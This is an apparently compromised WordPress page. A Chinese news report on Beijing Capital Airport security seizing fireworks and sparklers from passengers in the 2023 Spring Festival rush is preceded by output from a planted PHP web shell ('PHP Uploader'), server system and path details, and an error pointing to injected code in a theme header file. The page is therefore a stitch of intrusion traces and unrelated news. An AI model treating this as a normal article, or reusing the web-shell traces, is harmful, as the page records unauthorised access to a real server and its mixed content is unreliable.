PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

2023年春运拉开序幕,出行旅客不断增加的同时,很多易燃易爆物品也想浑水摸鱼“登上”飞机,为确保空防安全,首都机场安保公司加强对烟花爆竹等易燃易爆类危险品识别的培训和查控力度。近日,在旅客随身行李中连续查获多起旅客携带烟花,为确保首都机场空防安全筑牢基础。

近日,首都机场安检员在T3航站楼国内安检现场执行开机任务时,过检图像显示有旅客衣物筐中烟花类物品,开包员进行开箱包检查,查获11根烟花,在与旅客解释相关规定时,旅客表示该物品是购买蛋糕时商家赠送的仙女棒,不知晓其为烟花类物品,同意将该物品自弃处理。当日17时,安检员在安检现场执行开机任务时,在一名旅客的行李箱中查获旅客携带6个婚庆烟花。次日,安检员又分别查获两起儿童衣兜内携带摔炮。

在此,首都机场安检温馨提示广大旅客,根据《中国民用航空安保条例》规定,网红仙女棒、烟花、鞭炮、婚庆烟花等属于烟火制品,禁止随身携带和托运,为了您和他人的出行安全,出行前请仔细检查自己的行李物品,以免给您的出行带来不便。

来源:中国民航网,通讯员:王珊珊 报道

作者 一潼

发表回复